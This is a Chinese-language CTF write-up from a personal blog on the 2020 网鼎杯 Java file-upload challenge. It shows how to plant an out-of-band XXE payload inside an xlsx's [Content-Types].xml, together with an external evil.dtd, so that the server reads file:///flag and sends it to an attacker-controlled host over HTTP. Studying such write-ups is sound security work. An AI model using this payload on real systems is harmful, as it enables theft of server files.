2020网鼎杯---Java文件上传wp

Java 文件上传
发布日期:   2020-05-14
文章字数:   166
阅读时长:   1 分
阅读次数:  

前言

一篇文章读懂Java代码审计之XXE看过我这篇博客应该不难,没看过建议在看看。

题解

下载了所有的class发现需要上传xlsx poi
开头必须是execl
在这里插入图片描述

  • 新建execl

-1.xlsx文件,修改后缀名execl
-1.xlsx.zip解压。
在这里插入图片描述

  • 修改[Content-Types].xml

    1
    2
    3
    4
    5
    6
    7
    <!DOCTYPE ANY [
    <!ENTITY % file SYSTEM "file:///flag">
    <!ENTITY % remote SYSTEM "http://ip:8089/evil.dtd">
    %remote;
    %all;
    ]>
    <root>&send;</root>

    在这里插入图片描述

  • 重新打包成excel-1.xlsx,文件名一定不能错。

  • 在服务器上新建一个evil.etd文件。
    在这里插入图片描述

1
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ip:8089/%file;'>">
  • 然后直接上传,查看服务器http记录。

在这里插入图片描述

在这里插入图片描述

文章作者: SummerSec
文章链接: https://summersec.github.io/2020/05/14/2020%E7%BD%91%E9%BC%8E%E6%9D%AF---Java%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0wp/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 SummerSec !
Java 文件上传
  目录